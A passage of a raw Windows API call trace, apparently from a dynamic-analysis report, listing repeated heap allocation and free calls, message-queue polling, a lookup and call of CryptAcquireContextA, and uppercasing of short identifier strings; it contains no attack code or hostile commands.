dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.156] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0207.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0207.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.158] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0207.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0207.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0207.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.158] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0207.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3688 | out: hHeap=0x25c0000) returned 1 [0207.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.159] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0207.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.162] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.162] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0207.162] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0207.162] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0207.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.163] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0207.163] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.163] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0207.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.163] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.163] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.163] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.163] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0207.163] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.163] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.164] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.164] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.164] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.164] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.164] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.164] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.164] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.165] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0207.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0207.165] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0207.165] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.165] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0207.165] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.166] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.166] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.166] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.166] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.166] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.166] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.167] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.167] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.167] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.167] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.167] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.167] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.167] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.168] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.168] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.168] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 